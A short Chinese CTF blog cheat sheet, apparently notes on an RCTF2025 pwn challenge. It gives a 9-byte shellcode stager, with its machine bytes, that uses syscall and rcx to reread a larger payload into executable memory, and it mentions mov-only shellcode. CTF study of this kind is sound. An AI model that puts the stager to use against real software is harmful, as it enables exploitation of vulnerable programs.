ROP_cheatsheet 2025-11-22- 2025-11-28pwn限制字数shellcode 编写9 bytes内 当寄存器全0时,只需要执行一次syscall,就会把返回地址rip赋值给rcx寄存器,rcx寄存器就会有rwx地址,然后再mov rsi,rcx;mov dl,0xff;syscall,就会reread 所以九字节的构造如下 syscall //0f 05 mov rsi, rcx //48 89 ce mov dl, 0xff //b2 ff syscall //0f 05 来源 RCTF2025 Writeup - 星盟安全团队 只用mov的shellcodemov rax,?????????? mov [rip+???] ,rax v我50.本文作者:py本文链接:http://juryorca.github.io/2025/11/22/ROP-cheatsheet/版权声明:本博客所有文章除特别声明外,均默认采用 许可协议。
